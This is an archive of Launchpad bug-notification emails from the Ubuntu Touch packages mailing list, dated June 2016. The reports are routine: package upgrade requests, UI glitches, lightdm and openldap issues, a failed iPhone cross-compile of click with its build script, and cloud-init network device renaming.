[Touch-packages] [Bug 1493999] Re: xz-utils package is really, really old and should be updated to 5.2.2 with multi-core support

2016-06-04 Thread Rolf Leggewie
Just to be clear, that PPA has version 5.2.2 but I don't think it's
based off the git repo referenced above.

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to xz-utils in Ubuntu.
https://bugs.launchpad.net/bugs/1493999

Title:
  xz-utils package is really, really old and should be updated to 5.2.2
  with multi-core support

Status in xz-utils package in Ubuntu:
  Triaged
Status in xz-utils package in Debian:
  New

Bug description:
  Willy is currently using a really old version of xz-utils. The latest
  version at this time is 5.2.2, released in September 2015.  With
  multi-core support it adds an important feature for xz.

  http://git.tukaani.org/?p=xz.git;a=blob;f=NEWS;hb=HEAD

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/xz-utils/+bug/1493999/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1588252] Re: [File Manager] Display issue: big white gap below header (portrait) & top gets cut off (landscape) after OTA-11

2016-06-04 Thread Launchpad Bug Tracker
** Branch linked: lp:~dpniel/ubuntu-filemanager-app/fix-1588252

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to ubuntu-ui-toolkit in
Ubuntu.
https://bugs.launchpad.net/bugs/1588252

Title:
  [File Manager] Display issue: big white gap below header (portrait) &
  top gets cut off (landscape) after OTA-11

Status in Canonical System Image:
  Confirmed
Status in Ubuntu File Manager App:
  New
Status in ubuntu-ui-toolkit package in Ubuntu:
  Confirmed

Bug description:
  After the OTA-11 update, File Manager shows a big white space just below the 
header in portrait mode.
  https://launchpadlibrarian.net/262898404/screenshot20160602_150103754.png

  And also as Davide mentioned, top part goes off the display in landscape mode.
  https://launchpadlibrarian.net/262958275/screenshot20160602_184130460.png

  This only happens on E4.5 and E5, not on MX4 or M10
  0.4.525 of file manager

To manage notifications about this bug go to:
https://bugs.launchpad.net/canonical-devices-system-image/+bug/1588252/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1589194] [NEW] Browser freezes

2016-06-04 Thread Bob Harvey
Public bug reported:

I keep getting instances of the browser becoming unresponsive.

Not sure if there is a single cause, but it does seem to happen if I
attempt a pinch-zoom-out

Workaround is to swipe in from the left edge, find the apps menu, and
re-enter the browser with the icon

** Affects: webbrowser-app (Ubuntu)
 Importance: Undecided
 Status: New

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to webbrowser-app in Ubuntu.
https://bugs.launchpad.net/bugs/1589194

Title:
  Browser freezes

Status in webbrowser-app package in Ubuntu:
  New

Bug description:
  I keep getting instances of the browser becoming unresponsive.

  Not sure if there is a single cause, but it does seem to happen if I
  attempt a pinch-zoom-out

  Workaround is to swipe in from the left edge, find the apps menu, and
  re-enter the browser with the icon

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/webbrowser-app/+bug/1589194/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1589194] Re: Browser freezes

2016-06-04 Thread Bob Harvey
Tims is M10 tablet OTA11, but 10.1 was the same.

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to webbrowser-app in Ubuntu.
https://bugs.launchpad.net/bugs/1589194

Title:
  Browser freezes

Status in webbrowser-app package in Ubuntu:
  New

Bug description:
  I keep getting instances of the browser becoming unresponsive.

  Not sure if there is a single cause, but it does seem to happen if I
  attempt a pinch-zoom-out

  Workaround is to swipe in from the left edge, find the apps menu, and
  re-enter the browser with the icon

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/webbrowser-app/+bug/1589194/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1589188] [NEW] Cross-compiling for iPhone does not work

2016-06-04 Thread Avery Magnotti
Public bug reported:

When trying to cross-compile click for the iPhone, I am brought this
error:

In file included from paths.c:21:
In file included from /usr/include/glib-2.0/glib.h:30:
In file included from /usr/include/glib-2.0/glib/galloca.h:32:
/usr/include/glib-2.0/glib/gtypes.h:422:3: error: 
'_GStaticAssertCompileTimeAssertion_0' declared as an array with a negative size
  G_STATIC_ASSERT(sizeof (unsigned long long) == sizeof (guint64));
  ^~~~
/usr/include/glib-2.0/glib/gmacros.h:217:103: note: expanded from macro 
'G_STATIC_ASSERT'
#define G_STATIC_ASSERT(expr) typedef char G_PASTE 
(_GStaticAssertCompileTimeAssertion_, __COUNTER__)[(expr) ? 1 : -1] 
G_GNUC_UNUSED

  ^~~
1 warning and 1 error generated.


I use the following script to build click. It's quite messy, but here you go:

#!/bin/bash
rm -rf ~/built/click
PREFIX=~/toolchain/linux/iphone/bin/armv7-apple-darwin11
AR=$PREFIX-ar
AS=$PREFIX-as
CC=$PREFIX-clang
CXX=$PREFIX-clang++
LD=$PREFIX-ld
NM=$PREFIX-nm
OBJDUMP=$PREFIX-objdump
RANLIB=$PREFIX-ranlib
STRIP=$PREFIX-strip
SDK=/home/citrusui/sdks/iPhoneOS9.3.sdk
CFLAGS="-arch armv7 -arch arm64 -isysroot $SDK"
LDFLAGS="-Wl,-segalign,4000"
DESTDIR=~/built/click/
apt install autoconf bzr clang intltool libcurl4-openssl-dev libgee-0.8 
libjson-glib-dev libtool xutils-dev debhelper dh-autoreconf python3-all 
python3-setuptools pep8 python3-pep8 pyflakes python3-sphinx valac 
gobject-introspection libgirepository1.0-dev libpackagekit-glib2-dev 
python3-coverage dh-systemd
cd ~
if [ ! -d click ]; then
bzr branch lp:click
fi
cd ~/click
./autogen.sh
./configure cross_compiling=yes --prefix=/home/citrusui/built/click 
--sysconfdir=/etc --with-systemdsystemunitdir=/lib/systemd/system 
--with-systemduserunitdir=/usr/lib/systemd/user CC="$CC" CXX="$CXX" 
CFLAGS="$CFLAGS" CXXFLAGS="$CFLAGS" STRIP="$STRIP" RANLIB="$RANLIB" NM=$NM 
AR=$AR AS=$AS LD="$LD" OBJDUMP="$OBJDUMP" LDFLAGS="$LDFLAGS" DESTDIR="$DESTDIR"
make install
cd ~/built/click

Note that ~/toolchain contains data from
https://developer.angelxwind.net/Linux/ and ~/sdks/iPhoneOS9.3.sdk
contains data from https://jbdevs.org/sdks/.

** Affects: click (Ubuntu)
 Importance: Undecided
 Status: New

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to click in Ubuntu.
https://bugs.launchpad.net/bugs/1589188

Title:
  Cross-compiling for iPhone does not work

Status in click package in Ubuntu:
  New

Bug description:
  When trying to cross-compile click for the iPhone, I am brought this
  error:

  In file included from paths.c:21:
  In file included from /usr/include/glib-2.0/glib.h:30:
  In file included from /usr/include/glib-2.0/glib/galloca.h:32:
  /usr/include/glib-2.0/glib/gtypes.h:422:3: error: 
'_GStaticAssertCompileTimeAssertion_0' declared as an array with a negative size
G_STATIC_ASSERT(sizeof (unsigned long long) == sizeof (guint64));
^~~~
  /usr/include/glib-2.0/glib/gmacros.h:217:103: note: expanded from macro 
'G_STATIC_ASSERT'
  #define G_STATIC_ASSERT(expr) typedef char G_PASTE 
(_GStaticAssertCompileTimeAssertion_, __COUNTER__)[(expr) ? 1 : -1] 
G_GNUC_UNUSED

^~~
  1 warning and 1 error generated.

  
  I use the following script to build click. It's quite messy, but here you go:

  #!/bin/bash
  rm -rf ~/built/click
  PREFIX=~/toolchain/linux/iphone/bin/armv7-apple-darwin11
  AR=$PREFIX-ar
  AS=$PREFIX-as
  CC=$PREFIX-clang
  CXX=$PREFIX-clang++
  LD=$PREFIX-ld
  NM=$PREFIX-nm
  OBJDUMP=$PREFIX-objdump
  RANLIB=$PREFIX-ranlib
  STRIP=$PREFIX-strip
  SDK=/home/citrusui/sdks/iPhoneOS9.3.sdk
  CFLAGS="-arch armv7 -arch arm64 -isysroot $SDK"
  LDFLAGS="-Wl,-segalign,4000"
  DESTDIR=~/built/click/
  apt install autoconf bzr clang intltool libcurl4-openssl-dev libgee-0.8 
libjson-glib-dev libtool xutils-dev debhelper dh-autoreconf python3-all 
python3-setuptools pep8 python3-pep8 pyflakes python3-sphinx valac 
gobject-introspection libgirepository1.0-dev libpackagekit-glib2-dev 
python3-coverage dh-systemd
  cd ~
  if [ ! -d click ]; then
  bzr branch lp:click
  fi
  cd ~/click
  ./autogen.sh
  ./configure cross_compiling=yes --prefix=/home/citrusui/built/click 
--sysconfdir=/etc --with-systemdsystemunitdir=/lib/systemd/system 
--with-systemduserunitdir=/usr/lib/systemd/user CC="$CC" CXX="$CXX" 
CFLAGS="$CFLAGS" CXXFLAGS="$CFLAGS" STRIP="$STRIP" RANLIB="$RANLIB" NM=$NM 
AR=$AR AS=$AS LD="$LD" OBJDUMP="$OBJDUMP" LDFLAGS="$LDFLAGS" DESTDIR="$DESTDIR"
  make install
  cd ~/built/click

  Note that ~/toolchain contains data from
  https://developer.angelxwind.net/Linux/ and ~/sdks/iPhoneOS9.3.sdk
  contains data fro

[Touch-packages] [Bug 1462723] Re: lightdm quits at startup when beamer is connected

2016-06-04 Thread Launchpad Bug Tracker
[Expired for lightdm (Ubuntu) because there has been no activity for 60
days.]

** Changed in: lightdm (Ubuntu)
   Status: Incomplete => Expired

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to lightdm in Ubuntu.
https://bugs.launchpad.net/bugs/1462723

Title:
  lightdm quits at startup when beamer is connected

Status in lightdm package in Ubuntu:
  Expired

Bug description:
  I have a beamer. Since installation of kubuntu-15.04 I can't log into
  my account if the beamer is connected. The kubuntu splash screen show
  up alright, but takes a bit longer to complete, then I am dropped into
  a black screen with a (movable) mouse pointer.

  If I disconnect the beamer during startup, I can login.

  ProblemType: Bug
  DistroRelease: Ubuntu 15.04
  Package: lightdm 1.14.0-0ubuntu2
  ProcVersionSignature: Ubuntu 3.19.0-18.18-generic 3.19.6
  Uname: Linux 3.19.0-18-generic x86_64
  ApportVersion: 2.17.2-0ubuntu1.1
  Architecture: amd64
  CurrentDesktop: KDE
  Date: Sun Jun  7 10:15:33 2015
  InstallationDate: Installed on 2015-03-16 (82 days ago)
  InstallationMedia: Kubuntu 14.10 "Utopic Unicorn" - Release amd64 (20141022.1)
  LightdmGreeterLog:
   QInotifyFileSystemWatcherEngine::addPaths: inotify_add_watch failed: No such 
file or directory
   QFileSystemWatcher: failed to add paths: /var/lib/lightdm/.config/ibus/bus
   Bus::open: Can not get ibus-daemon's address. 
   IBusInputContext::createInputContext: no connection to ibus-daemon 
   file:///usr/share/kde4/apps/lightdm-kde-greeter/themes/userbar/main.qml:135: 
Unable to assign [undefined] to QString usersession
  LightdmGreeterLogOld:
   QInotifyFileSystemWatcherEngine::addPaths: inotify_add_watch failed: No such 
file or directory
   QFileSystemWatcher: failed to add paths: /var/lib/lightdm/.config/ibus/bus
   Bus::open: Can not get ibus-daemon's address. 
   IBusInputContext::createInputContext: no connection to ibus-daemon 
   file:///usr/share/kde4/apps/lightdm-kde-greeter/themes/userbar/main.qml:135: 
Unable to assign [undefined] to QString usersession
  SourcePackage: lightdm
  UpgradeStatus: Upgraded to vivid on 2015-04-25 (42 days ago)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/lightdm/+bug/1462723/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1537762] Re: syncrepl does not work when using tls

2016-06-04 Thread Launchpad Bug Tracker
[Expired for openldap (Ubuntu) because there has been no activity for 60
days.]

** Changed in: openldap (Ubuntu)
   Status: Incomplete => Expired

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to openldap in Ubuntu.
https://bugs.launchpad.net/bugs/1537762

Title:
  syncrepl does not work when using tls

Status in openldap package in Ubuntu:
  Expired

Bug description:
  
  syncrepl gives a "slap_client_connect: URI=ldap://ldaphost.domain.com Error, 
ldap_start_tls failed (-11)" error

  syncrepl was working perfectly until I upgraded libgnutls26 from

  version 2.12.14-5ubuntu3.10

  to

  version 2.12.14-5ubuntu3.11

  This new version of gnutls just seems to only have a simple fix for
  CVE-2015-7575

  ldapsearch works perfectly happily with the new version of gnutls and
  our SSL certificate.

  My syncrepl config looks like this:

  syncreplrid=222
  provider=ldap://ldaphost.domain.com
  starttls=critical
  type=refreshAndPersist
  retry=60,+
  searchbase="dc=ccc,dc=sss,dc=aa,dc=uu"
  scope=sub
  schemachecking=off
  bindmethod=simple
  binddn="cn=uu,dc=ccc,dc=s,dc=aa,dc=uu"
  credentials=

  ProblemType: Bug
  DistroRelease: Ubuntu 12.04
  Package: slapd 2.4.28-1.1ubuntu4.6
  ProcVersionSignature: Ubuntu 3.2.0-97.137-generic 3.2.73
  Uname: Linux 3.2.0-97-generic x86_64
  ApportVersion: 2.0.1-0ubuntu17.13
  Architecture: amd64
  Date: Mon Jan 25 13:33:26 2016
  InstallationMedia: Ubuntu-Server 12.04 LTS "Precise Pangolin" - Release amd64 
(20120424.1)
  MarkForUpload: True
  SourcePackage: openldap
  UpgradeStatus: No upgrade log present (probably fresh install)
  mtime.conffile..etc.default.slapd: 2012-10-02T10:07:38

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/openldap/+bug/1537762/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1565102] Re: The AlwaysShared option for lightdm does not work.

2016-06-04 Thread Launchpad Bug Tracker
[Expired for lightdm (Ubuntu) because there has been no activity for 60
days.]

** Changed in: lightdm (Ubuntu)
   Status: Incomplete => Expired

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to lightdm in Ubuntu.
https://bugs.launchpad.net/bugs/1565102

Title:
  The AlwaysShared option for lightdm does not work.

Status in lightdm package in Ubuntu:
  Expired

Bug description:
  Setup lightdm on Ubuntu 16.04 s390x beta2.  Successfully updated
  software.  Changed lightdm.conf to use the AlwaysShared option so that
  I could share a VNC session.  This did not work.

  ProblemType: Bug
  DistroRelease: Ubuntu 16.04
  Package: lightdm 1.18.0-0ubuntu2 [modified: 
lib/systemd/system/lightdm.service]
  ProcVersionSignature: Ubuntu 4.4.0-16.32-generic 4.4.6
  Uname: Linux 4.4.0-16-generic s390x
  ApportVersion: 2.20.1-0ubuntu1
  Architecture: s390x
  Date: Fri Apr  1 17:19:06 2016
  ProcEnviron:
   TERM=xterm-256color
   PATH=(custom, no user)
   XDG_RUNTIME_DIR=
   LANG=en_US.UTF-8
   SHELL=/bin/bash
  SourcePackage: lightdm
  UpgradeStatus: No upgrade log present (probably fresh install)
  mtime.conffile..etc.pam.d.lightdm: 2016-03-31T11:20:02.696961
  mtime.conffile..etc.pam.d.lightdm.greeter: 2016-03-31T11:47:26.478007

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/lightdm/+bug/1565102/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1580558] Re: Upgrade libseccomp from 2.2.3 ->2.3.1

2016-06-04 Thread Jeremy Bicha
** Tags added: upgrade-software-version

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to libseccomp in Ubuntu.
https://bugs.launchpad.net/bugs/1580558

Title:
  Upgrade libseccomp from 2.2.3 ->2.3.1

Status in Ubuntu on IBM z Systems:
  Confirmed
Status in libseccomp package in Ubuntu:
  Confirmed

Bug description:
  == Comment: #1 - Heinz-Werner Seeck  - 
2016-05-11 05:09:09 ==
  Please upgrade package libseccomp.
  The new version 2.3.1 is available on github

  https://github.com/seccomp/libseccomp/releases

  == Comment: #2 - Heinz-Werner Seeck  - 
2016-05-11 05:10:59 ==
  ?Version 2.3.0 - February 29, 2016
  ?Added support for the s390 and s390x architectures
  ?Added support for the ppc, ppc64, and ppc64le architectures
  ?Update the internal syscall tables to match the Linux 4.5-rcX releases
  ?Filter generation for both multiplexed and direct socket syscalls on x86
  ?Support for the musl libc implementation
  ?Additions to the API to enable runtime version checking of the library
  ?Enable the use of seccomp() instead of prctl() on supported systems
  ?Added additional tests to the regression test suite

  ?Version 2.3.1 - April 20, 2016 
  ?Fixed a problem with 32-bit x86 socket syscalls on some systems
  ?Fixed problems with ipc syscalls on 32-bit x86
  ?Fixed problems with socket and ipc syscalls on s390 and s390x

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu-z-systems/+bug/1580558/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1400580] Re: Color Inverse on display. Toggle Negative Image

2016-06-04 Thread mikodo
"imploring" not, impeaching.

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to mir in Ubuntu.
https://bugs.launchpad.net/bugs/1400580

Title:
   Color Inverse on display. Toggle Negative Image

Status in Mir:
  Fix Released
Status in mir package in Ubuntu:
  Fix Released
Status in unity8 package in Ubuntu:
  Triaged

Bug description:
  I would like to see a feature that allowed Unity8, to easily inverse
  the desktop colors.  To be able to easily turn on and off a negative
  (inverse) display of the desktop. For now, it can be done with X
  (xcalib). It would be nice to see Unity8 do this natively, instead of
  Ubuntu users needing this feature hoping, X-11 support will always be
  available.

  This is a feature I use, due to impaired eye-sight.

To manage notifications about this bug go to:
https://bugs.launchpad.net/mir/+bug/1400580/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1579130] Re: need to support renaming of devices in container and on first boot

2016-06-04 Thread Launchpad Bug Tracker
This bug was fixed in the package cloud-init - 0.7.7~bzr1227-0ubuntu1

---
cloud-init (0.7.7~bzr1227-0ubuntu1) yakkety; urgency=medium

  * New upstream snapshot.
- fix one more unit test to run inside buildd.

 -- Scott Moser   Sat, 04 Jun 2016 20:55:07 -0400

** Changed in: cloud-init (Ubuntu)
   Status: Confirmed => Fix Released

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to systemd in Ubuntu.
https://bugs.launchpad.net/bugs/1579130

Title:
  need to support renaming of devices in container and on first boot

Status in cloud-init package in Ubuntu:
  Fix Released
Status in systemd package in Ubuntu:
  Triaged

Bug description:
  We're interested in supporting network configuration of cloud
  instances including lxc containers via maas/cloud-init yaml format.

  For Containers, the end goal is to do:
  $ lxc init xenial x1
  $ ncpath=/var/lib/cloud/seed/nocloud-net/network-config
  $ sudo tee /var/lib/lxd/containers/x1/rootfs/$ncpath < 
into 'eth0').
   That is implemented by check of 
/sys/devices/virtual/net/eth0/name_assign_type . Value of 4 means renamed.

   c.) systemd.link will not attempt to rename a device that does not have a 
driver.
     To see that run: udevadm test-builtin net_setup_link /sys/class/net/eth0
     http://paste.ubuntu.com/16261974/

   d.) on first boot of a cloud instance, the systemd.link files in the
  initramfs are either pristine or from the previous instance.  The
  devices will leave the initramfs either named incorrectly or named
  with standard persistent naming and will have already been renamed.

  To force these systemd.link files to run in spite of 'b' on kvm guests
  or bare metal, we have found that unbind and rebind of the device will
  clear the state and rename would occur.  that can be done as shown in
  https://bugs.launchpad.net/ubuntu/+source/cloud-
  init/+bug/1577844/comments/3 but since there is no 'driver' we cannot
  unbind and rebind veth devices.

  To do this right, we need to support:
   1.) renaming on first boot with initramfs and with 'stale' initramfs
   2.) renaming in lxc containers
   3.) user updating whatever files or mechanism is used post first boot.  For 
example, if the user wrote a 25-my-rules.link after first boot, a reboot should 
prefer their provided names to whatever were originally there.
   4.) if cloud-init networking is disabled, the renaming should not occur.

  
  ProblemType: Bug
  DistroRelease: Ubuntu 16.04
  Package: udev 229-4ubuntu4
  ProcVersionSignature: Ubuntu 4.4.0-21.37-generic 4.4.6
  Uname: Linux 4.4.0-21-generic x86_64
  ApportVersion: 2.20.1-0ubuntu2
  Architecture: amd64
  Date: Fri May  6 15:42:52 2016
  MachineType: LENOVO 33672B7
  ProcEnviron:
   TERM=xterm-256color
   PATH=(custom, no user)
  ProcKernelCmdLine: BOOT_IMAGE=/boot/vmlinuz-4.4.0-21-generic.efi.signed 
root=UUID=19ac97d5-6973-4193-9a09-2e6bbfa38262 ro quiet splash vt.handoff=7
  SourcePackage: systemd
  UpgradeStatus: No upgrade log present (probably fresh install)
  dmi.bios.date: 12/18/2013
  dmi.bios.vendor: LENOVO
  dmi.bios.version: G8ET96WW (2.56 )
  dmi.board.asset.tag: Not Available
  dmi.board.name: 33672B7
  dmi.board.vendor: LENOVO
  dmi.board.version: Not Defined
  dmi.chassis.asset.tag: No Asset Information
  dmi.chassis.type: 10
  dmi.chassis.vendor: LENOVO
  dmi.chassis.version: Not Available
  dmi.modalias: 
dmi:bvnLENOVO:bvrG8ET96WW(2.56):bd12/18/2013:svnLENOVO:pn33672B7:pvrThinkPadX131e:rvnLENOVO:rn33672B7:rvrNotDefined:cvnLENOVO:ct10:cvrNotAvailable:
  dmi.product.name: 33672B7
  dmi.product.version: ThinkPad X131e
  dmi.sys.vendor: LENOVO

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/cloud-init/+bug/1579130/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1288182] Re: Cyrillic not displayed in the input field

2016-06-04 Thread Kjeld Flarup
I tested with this form:
http://archive.mid.ru//bul_ns_en.nsf/uvedomlenie.pdf

Foxit Reader for Linux works fine, no need to use Wine
So does google-chrome, it even edits the forms.
Firefox fails, but prints a ? for every cyrillic letter

Im quite sure that this problem can be solved with some font knowlegde.
Somehow it must be possible to find ut which Cyrillic font is used in
the document, and then make some kind of font substitution in the
system.

But weel, I found two working alternatives, so I do not need to fill in
these documents by hand this summer :-)

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to poppler in Ubuntu.
https://bugs.launchpad.net/bugs/1288182

Title:
  Cyrillic not displayed in the input field

Status in Evince:
  Unknown
Status in Poppler:
  Confirmed
Status in evince package in Ubuntu:
  Triaged
Status in poppler package in Ubuntu:
  Invalid

Bug description:
  Ubuntu 14.04 x64
  Evince 3.10.3
  Cyrillic not displayed in the input field.

  In attach screenshot: input field with text 'This сyrillic:
  "Кириллица"'

  Upd.

  Still actual for Ubuntu 16.04 x64
  Evince 3.18.2

To manage notifications about this bug go to:
https://bugs.launchpad.net/evince/+bug/1288182/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


Re: [Touch-packages] [Bug 1413818] Re: Notification sounds aren't being played back on E4.5 (ubuntu-push restricts directories and block custom sounds)

2016-06-04 Thread Victor gonzalez
Hi Groby!

Please check if changing the message ringtone in settings>sound fix it.
Aquaris ringtone is set by default and it could be the problem.

Cheers,
On 4 Jun 2016 22:15, "groby" <1413...@bugs.launchpad.net> wrote:

> Seems like the Bug is back on OTA-11 - ubuntu-touch-session
> 0.108+15.04.20160415-0ubuntu1
>
> I don't get no notification sound by telegram anymore.
>
> --
> You received this bug notification because you are subscribed to a
> duplicate bug report (1531162).
> https://bugs.launchpad.net/bugs/1413818
>
> Title:
>   Notification sounds aren't being played back on E4.5 (ubuntu-push
>   restricts directories and block custom sounds)
>
> Status in Canonical System Image:
>   Fix Released
> Status in The Savilerow project:
>   Invalid
> Status in ubuntu-push package in Ubuntu:
>   Fix Released
> Status in ubuntu-touch-session package in Ubuntu:
>   Fix Released
> Status in ubuntu-touch-session package in Ubuntu RTM:
>   Fix Released
>
> Bug description:
>   This affects mostly the push notifications based alerts, SMS et.al.
>   work fine.
>
>   With export PULSE_PROP='media.role=alert'
>
>   This has no audible output: paplay
> /usr/share/sounds/ubuntu/notifications/Slick.ogg
>   This does:  paplay /usr/share/sounds/ubuntu/ringtones/Soul.ogg
>
>   $ system-image-cli -i
>   current build number: 14
>   device name: mako
>   channel: ubuntu-touch/stable
>   alias: ubuntu-touch/ubuntu-rtm/14.09
>   last update: 2015-01-16 13:12:29
>   version version: 14
>   version ubuntu: 20150116
>   version device: 20141119
>   version custom: mako-1.1
>
>   The hunch is some buffering going on on the android side for short
>   sound bytes.
>
> To manage notifications about this bug go to:
>
> https://bugs.launchpad.net/canonical-devices-system-image/+bug/1413818/+subscriptions
>

-- 
 

 Nos encantan los árboles. No me imprimas si no es necesario.

Protección de Datos: Mundo Reader S.L. le informa de que los datos 
personales facilitados por Ud. y utilizados para el envío de esta 
comunicación serán objeto de tratamiento automatizado o no en nuestros 
ficheros, con la finalidad de gestionar la agenda de contactos de nuestra 
empresa y para el envío de comunicaciones profesionales por cualquier medio 
electrónico o no. Puede consultar en www.bq.com los detalles de nuestra 
Política de Privacidad y dónde ejercer el derecho de acceso, rectificación, 
cancelación y oposición.

Confidencialidad: Este mensaje contiene material confidencial y está 
dirigido exclusivamente a su destinatario. Cualquier revisión, modificación 
o distribución por otras personas, así como su reenvío sin el 
consentimiento expreso está estrictamente prohibido. Si usted no es el 
destinatario del mensaje, por favor, comuníqueselo al emisor y borre todas 
las copias de forma inmediata. Confidentiality: This e-mail contains 
material that is confidential for de sole use of de intended recipient. Any 
review, reliance or distribution by others or forwarding without express 
permission is strictly prohibited. If you are not the intended recipient, 
please contact the sender and delete all copies.

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to ubuntu-touch-session in
Ubuntu.
https://bugs.launchpad.net/bugs/1413818

Title:
  Notification sounds aren't being played back on E4.5 (ubuntu-push
  restricts directories and block custom sounds)

Status in Canonical System Image:
  Fix Released
Status in The Savilerow project:
  Invalid
Status in ubuntu-push package in Ubuntu:
  Fix Released
Status in ubuntu-touch-session package in Ubuntu:
  Fix Released
Status in ubuntu-touch-session package in Ubuntu RTM:
  Fix Released

Bug description:
  This affects mostly the push notifications based alerts, SMS et.al.
  work fine.

  With export PULSE_PROP='media.role=alert'

  This has no audible output: paplay 
/usr/share/sounds/ubuntu/notifications/Slick.ogg
  This does:  paplay /usr/share/sounds/ubuntu/ringtones/Soul.ogg

  $ system-image-cli -i
  current build number: 14
  device name: mako
  channel: ubuntu-touch/stable
  alias: ubuntu-touch/ubuntu-rtm/14.09
  last update: 2015-01-16 13:12:29
  version version: 14
  version ubuntu: 20150116
  version device: 20141119
  version custom: mako-1.1

  The hunch is some buffering going on on the android side for short
  sound bytes.

To manage notifications about this bug go to:
https://bugs.launchpad.net/canonical-devices-system-image/+bug/1413818/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 764414] Re: private master bugs are confusing and lead to more duplicate filings

2016-06-04 Thread C de-Avillez
reverting to Triaged.

** Changed in: apport (Ubuntu)
   Status: In Progress => Triaged

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to apport in Ubuntu.
https://bugs.launchpad.net/bugs/764414

Title:
  private master bugs are confusing and lead to more duplicate filings

Status in apport package in Ubuntu:
  Triaged

Bug description:
  Binary package hint: apport

  Apport currently tracks the master bug as a private bug visible only
  to Ubuntu developers (bugcontrol) and makes duplicate bugs public
  after stripping their data.

  This works well but has some downsides:
   - Launchpad cannot show the master bug to folk reporting bugs via apport (so 
they file new bugs always)
   - After users file a new bug apport detects its a duplicate and then they 
cannot see the master bug and get frustrated.

  It would be nice to have:
   - the master bug be public so that reporters of dups can see it in the dupe 
finder and can see if a dupe is detected post-filing.
   - Developers still have easy access to the raw crash data.
    - One way to do that that does not need much development would be to have a 
private bug exist, linked from the master bug (e.g. with a comment or in the 
description; something like 'Confidential crashdump for this bug is attached to 
bug 12345 - only visible to Ubuntu developers').

  One way to achieve this is to have apport file a new public bug to be
  the master. This would have the necessary metadata and would include
  the link to the private bug + gather all the duplicates to itself. One
  downside is that Apport would appear to be the bug reporter for all
  crashdump based bug reports. That's not necessarily a bad thing, but
  it may confuse people.

  Another way would be to have apport file a new private bug, move the
  attachments over from the original bug, add explanation and metadata
  in the description, subscribe bugcontrol and then sanitise the
  original bug report the same way it sanitises public bugs today. This
  would make the original bug be the public master, preserving the date
  of filing and the reporter. OTOH large files would need to be shuffled
  around and this might be unreliable.

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/apport/+bug/764414/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


